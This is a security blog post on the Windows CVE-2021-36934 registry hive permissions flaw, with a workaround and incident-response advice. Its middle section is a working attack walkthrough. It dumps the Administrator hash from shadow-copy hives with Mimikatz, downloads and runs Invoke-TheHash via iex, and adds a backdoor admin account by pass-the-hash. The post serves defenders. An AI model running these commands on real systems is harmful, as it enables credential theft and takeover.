What To Know About Microsoft’s Registry Hive Flaw: #SeriousSAM
#hivenightmare / #lolwut
Jeff McJunkin* //
What is it?
tl;dr — Unpatched privilege escalation in Windows 10 in nearly all supported builds.
The vulnerability (CVE-2021–36934) allows an attacker with limited user code execution on Windows 10 (or 11) to gain administrative privileges locally, allowing any of the following follow-on attacks:
- Stealing credential material for any logged-on users (via Mimikatz-style LSASS attacks)
- Dumping and cracking cached domain credentials
- Persistence on the Windows 10 machine via Silver Ticket attacks
What can we do?
There is no patch from Microsoft, but there is an available workaround:
Due to weak permissions, limited users can read registry hive files at the following paths:
C:\Windows\System32\config\SAM C:\Windows\System32\config\SYSTEM C:\Windows\System32\config\SAM
Which versions of Windows 10 are affected?
Fresh builds of Windows 10 versions 1809 and above appear to be vulnerable, though strangely fresh installations of updated Windows 10 20H1 ISO’s are an exception.
How can an attacker take advantage of this flaw?
An extremely common scenario for initial access is phishing, giving an attacker control over an employee’s computer (whether it’s a laptop, desktop, virtual desktop, etc).
“` cls :: Running as “limiteduser”, a fresh account that is not in the Administrators group: whoami whoami /groups net user limiteduser
:: This system is a fresh installation of Windows 10 1809, the oldest supported Windows 10 build ver
:: Like nearly all such builds, it has the permissions flaw of allowing limited users access to registry hives: icacls C:\Windows\System32\config\SAM | findstr “Users”
:: Set an environment variable pointing to the latest Volume Shadow Copy (enabled by default on Windows 10 with system drives >= 128GB) set directory=\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\system32\config $directory = “\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\system32\config” :: Point Mimikatz at the VSS backups and filter for the Administrator user and hash :: Other tools can do this too, or an attacker could simply exfiltrate the registry hives and use Mimikatz on their machine mimikatz “lsadump::sam /system:%directory%\system /sam:%directory%\sam” exit | findstr /c:”User : Administrator” /c:”8846″ .\mimikatz.exe “lsadump::sam /system:$directory\system /sam:$directory\sam” exit | findstr /c:”User : Administrator” /c:”8846″
:: AMSI is not a defense here, or in general
https://amsi.fail/ Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString(‘https://github.com/Kevin-Robertson/Invoke-TheHash/raw/master/Invoke-TheHash.ps1’))
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString(‘https://github.com/Kevin-Robertson/Invoke-TheHash/raw/master/Invoke-SMBExec.ps1’))
Invoke-TheHash -Type SMBExec -Target 127.0.0.1 -Username Administrator -hash 8846f7eaee8fb117ad06bdd830b7586c -Command “net user hacker TipYourWaiters /add”
Invoke-TheHash -Type SMBExec -Target 127.0.0.1 -Username Administrator -hash 8846f7eaee8fb117ad06bdd830b7586c -Command “net localgroup Administrators hacker /add”
:: Compare that to the known password of ‘password’ — it matches python -c “import hashlib, binascii; print(binascii.hexlify(hashlib.new(‘md4′,’password’.encode(‘utf-16le’)).digest()))”
icacls C:\Windows\System32\config\SAM | findstr “Users”
vssadmin list shadows | findstr “Original” “`
Does removing the Users group permissions from the registry hives fix the issue?
No, the original permissions will be kept on the Volume Shadow Copy snapshots of the filesystem (https://twitter.com/wdormann/status/1417525453116608512)
Does disabling the Volume Shadow Copy service remove all prior snapshots?
No, disabling the Volume Shadow Copy service only removes snapshots made for System Protection purposes (https://twitter.com/wdormann/status/1417547126347808774)
Which builds of Windows 10 are vulnerable by default?
Essentially, any Windows 10 starting from build 1809 and above are vulnerable. Some later revisions of the Windows 10 1809 ISO’s have the correct / non-vulnerable permissions, however, and those permissions are preserved with further Windows updates and upgrades to later builds. I would strongly recommend treating all supported Windows 10 builds as vulnerable
Source: https://twitter.com/jeffmcjunkin/status/1417281315016122372 and https://twitter.com/gentilkiwi/status/1417484076550873089
Never Waste A Crisis
Start Developing Incident Response Capabilities
Velociraptor scales nicely and allows both for sweeping checks for the vulnerability, along with actual remediation via Microsoft’s workaround.
Other incident response tools are fine if they have the following minimum capabilities:
- Solution scales to your number of endpoints
- Allows for fine-grained targeting of threat hunts and actions
- Supports on-prem, cloud-hosted, and devices outside the corporate network
* Thanks to our friend Jeff McJunkin for sharing his knowledge with the Black Hills Information Security (BHIS) community.
Ready to learn more?
Level up your skills with affordable classes from Antisyphon!
Available live/virtual and on-demand